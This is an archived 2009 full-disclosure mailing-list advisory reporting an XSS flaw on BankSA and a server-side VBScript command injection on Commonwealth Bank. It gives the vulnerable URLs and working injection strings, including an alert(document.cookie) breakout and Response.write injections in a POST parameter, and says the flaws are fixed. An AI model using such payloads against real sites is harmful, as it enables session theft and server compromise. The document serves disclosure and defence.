lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 12 May 2009 18:44:56 +0800
From: militan c7 <militan.c7@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Security Advisory: Banks in Australia

==============================================
Security Advisory: Banks in Australia

militan (Chia-Jun Lin)
militan.c7@...il.com
adl.csie.ncu.edu.tw/~militan <http://adl.csie.ncu.edu.tw/%7Emilitan>
militan-c7.blogspot.com
Advanced Defense Lab(ADL), NCU CSIE TAIWAN
12th May, 2009
==============================================


I. VULNERABILITY
-------------------------
XSS
Command Injection

Banks below are vulnerable:
BankSA. www.banksa.com.au
Commonwealth Bank. www.commbank.com.au
etc...

II. DESCRIPTION
-------------------------
Some banks contain vulnerabilities in certain pages, which may be misused by
attackers. Via the command injection, attackers can execute any vbscript
command on the hosts.

Generally, the security mechanism of the websites of banks in AU are
implemented indeed. However, their complex architectures are unnecessary
actually. Due to the large architectures, some pages do not perform the
validation properly.


III. Detail & POC
------------------------
1. BankSA: XSS. Javascript Injection.
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
The BBO function means "Business banking online", and the vulnerable
variable is "origin".

If origin=CBS, the page will immediately redirect to the link below.
www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS

Nevertheless, if origin=CBS" then the page would redirect inappropriately.
****javascript code generated in the intermediate page
function focusWin()
{
  window.focus();
  //var theUrl = window.location.pathname;
  //var pos = theUrl.indexOf("help.asp");
  //theUrl = theUrl.substr(0,pos);
  window.location.href = "
http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS
"";
  //document.write("
http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS
"");
}
window.onload = focusWin;
****

Exploit:
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
";%0a%0aalert(document.cookie);//
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
";}</script>%0a%0a<script>alert("Vulnerable")</script>
POC:
http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/banksa1.jpg>
http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/banksa2.jpg>
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/banksa3.jpg>


2. Commonwealth Bank: ASP command injection (server-side vbscript injection)
The commbank provides lots of tools to calculate, or to evaluate the
financial plan.
This page would collect personal information and make an appointment.
www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp
However, almost all the parameters are manipulated in vbscript on server.

Moreover, the page will return the error message when you mangle the
parameters. Thus attackers can craft the exploit easily, and then arbitrary
vbscript commands can be executed on server.

Exploit:
post parameter: Whattodo (default: FillForm)
FillForm & Response.write("ccccc")'
FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '
POC:
http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank1.jpg>
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank2.jpg>
<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank3.jpg>
http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg<http://adl.csie.ncu.edu.tw/%7Emilitan/commbank4.jpg>


IV. SOLUTION& CONCLUSION
-------------------------
Most banks in AU should reduce the enormous architecture of their website*:*
do not provide additional functions or make sure that these functions are
secure.

The vulnerabilities have been fixed already.


regards
--
militan
Advanced Defense Lab, NCU Taiwan

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ